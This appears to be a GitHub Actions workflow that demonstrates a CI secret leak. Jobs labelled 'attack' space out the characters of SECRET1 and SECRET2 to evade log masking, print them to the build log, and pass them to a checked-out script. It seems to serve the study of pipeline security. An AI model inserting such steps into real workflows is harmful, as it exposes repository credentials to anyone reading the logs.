name: Hello_push-attack

on:
  workflow_dispatch:
  push:
  
jobs:
  HelloPushJob-attack:
    runs-on: ubuntu-latest
    steps:
    - name: Say Hello
      shell: pwsh
      run: | 
        Write-Host "hello!"
  UseSecret-attack:
    runs-on: ubuntu-latest
    steps:
    - name: Print SECRET
      shell: pwsh
      env: 
        SECRET1: ${{secrets.SECRET1}}
        SECRET2: ${{secrets.SECRET2}}
      run: | 
        $secret1 = ($env:SECRET1 -split '') -join ' '
        $secret2 = ($env:SECRET2 -split '') -join ' '
        Write-Host "-----------------start"
        Write-Host "SECRET1:" $secret1
        Write-Host "SECRET2:" $secret2
        Write-Host "-----------------end"
    - name: Check out
      uses: actions/checkout@v4
    - name: Print SECRET - script
      shell: pwsh
      env: 
        SECRET1: ${{secrets.SECRET1}}
        SECRET2: ${{secrets.SECRET2}}
      run: ./test.ps1        
  UseSecret-env-attack:
    runs-on: ubuntu-latest
    environment: demo
    steps:
    - name: Print SECRET
      shell: pwsh
      env: 
        SECRET1: ${{secrets.SECRET1}}
        SECRET2: ${{secrets.SECRET2}}
      run: | 
        $secret1 = ($env:SECRET1 -split '') -join ' '
        $secret2 = ($env:SECRET2 -split '') -join ' '
        Write-Host "-----------------start"
        Write-Host "SECRET1:" $secret1
        Write-Host "SECRET2:" $secret2
        Write-Host "-----------------end"
    - name: Check out
      uses: actions/checkout@v4
    - name: Print SECRET - script
      shell: pwsh
      env: 
        SECRET1: ${{secrets.SECRET1}}
        SECRET2: ${{secrets.SECRET2}}
      run: ./test.ps1  
